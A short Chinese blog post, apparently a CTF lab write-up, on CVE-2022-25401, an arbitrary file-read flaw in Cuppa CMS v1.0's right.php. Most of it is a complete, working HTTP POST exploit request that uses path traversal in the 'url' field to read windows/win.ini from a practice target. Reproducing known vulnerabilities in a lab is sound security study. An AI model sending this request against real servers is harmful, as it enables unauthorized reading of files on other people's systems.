CVE-2022-25401

发表于2023-06-11 | 更新于 2023-06-11 | CTF kali 网安

| 字数总计: 760 | 阅读时长: 1分钟 | 阅读量: 710

这篇文章距离最后更新已过342天,如果文章内容或图片资源失效，请留言反馈，我会及时处理，谢谢！

简介

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

本人使用春秋云境免费靶场在线搭建。

详解

github上搜到了payload，如下：

POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

作者: cultureSun

文章链接: https://culturesun.site/index.php/archives/1776.html